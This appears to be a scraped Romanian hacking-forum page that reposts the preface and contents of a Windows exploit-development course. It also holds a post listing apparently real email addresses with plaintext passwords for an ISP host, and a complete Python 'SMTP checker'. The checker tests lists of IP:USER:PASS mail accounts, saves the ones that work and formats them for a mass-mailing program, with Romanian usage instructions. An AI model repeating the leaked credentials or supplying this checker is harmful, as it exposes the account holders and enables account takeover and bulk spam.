Leaderboard

Hello RST : Exploit Development Course 2015 --> Free Preface Hi and welcome to this website! I know people don’t like to read prefaces, so I’ll make it short and right to the point. This is the preface to a course about Modern Windows Exploit Development. I chose Windows because I’m very familiar with it and also because it’s very popular. In particular, I chose Windows 7 SP1 64-bit. Enough with Windows XP: it’s time to move on! There are a few full-fledged courses about Exploit Development but they’re all very expensive. If you can’t afford such courses, you can scour the Internet for papers, articles and some videos. Unfortunately, the information is scattered all around the web and most resources are definitely not for beginners. If you always wanted to learn Exploit Development but either you couldn’t afford it or you had a hard time with it, you’ve come to the right place! This is an introductory course but please don’t expect it to be child’s play. Exploit Development is hard and no one can change this fact, no matter how good he/she is at explaining things. I’ll try very hard to be as clear as possible. If there’s something you don’t understand or if you think I made a mistake, you can leave a brief comment or create a thread in the forum for a longer discussion. I must admit that I’m not an expert. I did a lot of research to write this course and I also learned a lot by writing it. The fact that I’m an old-time reverse engineer helped a lot, though. In this course I won’t just present facts, but I’ll show you how to deduce them by yourself. I’ll try to motivate everything we do. I’ll never tell you to do something without giving you a technical reason for it. In the last part of the course we’ll attack Internet Explorer 10 and 11. My main objective is not just to show you how to attack Internet Explorer, but to show you how a complex attack is first researched and then carried out. Instead of presenting you with facts about Internet Explorer, we’re going to reverse engineer part of Internet Explorer and learn by ourselves how objects are laid out in memory and how we can exploit what we’ve learned. This thoroughness requires that you understand every single step of the process or you’ll get lost in the details. As you’ve probably realized by now, English is not my first language (I’m Italian). This means that reading this course has advantages (learning Exploit Development) and disadvantages (unlearning some of your English). Do you still want to read it? Choose wisely To benefit from this course you need to know and be comfortable with X86 assembly. This is not negotiable! I didn’t even try to include an assembly primer in this course because you can certainly learn it on your own. Internet is full of resources for learning assembly. Also, this course is very hands-on so you should follow along and replicate what I do. I suggest that you create at least two virtual machines with Windows 7 SP1 64-bit: one with Internet Explorer 10 and the other with Internet Explorer 11. I hope you enjoy the ride! Contents WinDbg Mona 2 Structure Exception Handling (SEH) Heap Windows Basics Shellcode Exploitme1 (ret eip overwrite) Exploitme2 (Stack cookies & SEH) Exploitme3 (DEP) Exploitme4 (ASLR) Exploitme5 (Heap Spraying & UAF) EMET 5.2 Internet Explorer 10 Reverse Engineering IE From one-byte-write to full process space read/write God Mode (1) God Mode (2) Use-After-Free bug Internet Explorer 11 Part 1 Part 2 Regards NO-MERCY PDF'S Soooooooon Source : http://expdev-kiuhnm.rhcloud.com/2015/05/11/contents/

Fratele meu alb @wirtz https://don_rhadoo@yahoo.com:UriocRadu88@digicare.rcs-rds.ro https://lulubujor@gmail.com:ionutlulu@digicare.rcs-rds.ro https://d.voica93@yahoo.com:429562@digicare.rcs-rds.ro https://2504217:590732@digicare.rcs-rds.ro

Hi, im nobody and im from Rusia, sorry for bad english i use google translate in most of case's.. My skills: pentesting and web-design(full template)

Salut,si bine ai venit !

#!usr/bin/python #darkSMTPv.py #SMTP Checker - using Authentication #Coded by P47r1ck & low1z #----------------------------------- #... To be continued ... # # #THE CODE WILL TAKE A LIST OF SMTP ACCOUNTS IN THE FOLLOWING FORMAT (IP:USER:PASS) WILL TRY TO LOGIN AND THEN SEND AN #EMAIL TO THE ADDRESS THAT YOU CAN CHANGE ANYTIME IN THE CODE ( look below the #Create the message at the toaddr= )[LINE 33] # #EVERY WORKING SMTP ACCOUNT WILL PRINTED ON THE SCREEN WITH THE FOLLOWING MESSAGE : [!] Email Sent Successfully: IP USER PASS # #THE CODE HAS THE FOLLOWING FEATURES. # # 1. IT WILL SAVE THE LIST OF WORKING SMTP ACCOUNTS TO FILE OUTPUT THAT YOU WILL CHOOSE. # 2. YOU CAN ALSO SPECIFY THE EMAIL WHERE THE SMTP CAN SEND THE TEST EMAIL. # 3. IT WILL MAKE A LIST OF SERVERS FOR THE AMS (ADVANCED MASS SENDER PROGRAM), SO YOU CAN INSERT MORE EASIER THE SMTP #LIST INTO THE AMS.INI FILE FROM THE AMS PROGRAM. (LIST IS SAVED TO AMSlist.txt) # # # MORE FEATURES ARE COMING SOON!!! import sys, smtplib, socket, time from smtplib import SMTP socket.setdefaulttimeout(5) # smtp default timeout, change number to speed up large lists def printHelp(): print '\nHow to use it ? There you go -- > ./darkSMTPv.py <accounts> <outputfile>' print '\nImportant: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS\n' # Create the message fromaddr = "thewonderousmailmachine@wtfbbq.net" toaddr = "youremail@account.com" #toaddr = "someone@yahoo.com" message = """To: %s From: %s Subject: SMTP Checker! Online! facem un mic test """ % (toaddr,fromaddr) print "\n _ _ _____ __ __ _______ _____ " print " | | | | / ____| \/ |__ __| __ \ " print " __| | __ _ _ __| | _| (___ | \ / | | | | |__) |_ __" print " / _` |/ _` | '__| |/ /\___ \| |\/| | | | | ___/\ \ / /" print "| (_| | (_| | | | < ____) | | | | | | | | \ V / " print " \__,_|\__,_|_| |_|\_\_____/|_| |_| |_| |_| \_/ \n" print "\n This is not stopping here! ... To be continued." print "More features will be added soon. For bugs p47r1ckro[at]gmail[dot]com\n" print "_______________________________________________________________________" def timer(): now = time.localtime(time.time()) return time.asctime(now) def sendchk(listindex, host, user, password): # seperated function for checking try: smtp = smtplib.SMTP(host) smtp.login(user, password) code = smtp.ehlo()[0] if not (200 <= code <= 299): code = smtp.helo()[0] if not (200 <= code <= 299): raise SMTPHeloError(code, resp) smtp.sendmail(fromaddr, toaddr, message) print "\n\t[!] Email Sent Successfully:",host, user, password print "\t[!] Message Sent Successfully\n" LSstring = host+":"+user+":"+password+"\n" nList.append(LSstring) # special list for AMS file ID's LFile = open(output, "a") LFile.write(LSstring) # save working host/usr/pass to file LFile.close() AMSout = open("AMSlist.txt", "a") AMSout.write("[Server"+str(nList.index(LSstring))+"]\nName="+str(host)+"\nPort=25\nUserID=User\nBccSize=50\nUserName="+str(user)+"\nPassword="+str(password)+"\nAuthType=0\n\n") smtp.quit() except(socket.gaierror, socket.error, socket.herror, smtplib.SMTPException), msg: print "[-] Login Failed:", host, user, password pass if len(sys.argv) != 3: printHelp() exit(1) # Do not change anything below. accounts = sys.argv[1] output = sys.argv[2] try: handle = list(open(accounts)) except: print"\n[+] We were unable to open the SMTP filelist. Check again your path and try again." print"\n[+] Ciao...." #listindex = 0 nList = [] for line in handle: try: host = line.split(':')[0] user = line.split(':')[1].replace('\n', '') password = line.split(':')[2].replace('\n', '') sendchk(handle.index(line), host, user, password) except: print '\n[+] We have found a error in your accounts list' print host, user print '\n[!] IMPORTANT: THE SMTP ACCOUNTS MUST BE IN THE FOLLOWING FORMAT : IP:USER:PASS' print '\n[-] Exiting....\n' exit(1) print "[!] Ended at: " + timer() + "" Mai sus aveti un verifier facut in python e simplu de folosit si nu este virusat! NU este facut de mine! va puneti adresa de email la toaddr = "youremail@account.com" smtpurile sa fie salvate intr-un fisier sub forma ip:user:pass si se verifica asa python verfier.py x x1 x - fiind lista de smtpuri x1 lista unde se salveaza smtpurile bune o sa va faca o lista separat pt AMS doar trebuie sa scrie sus Total servers .....

salut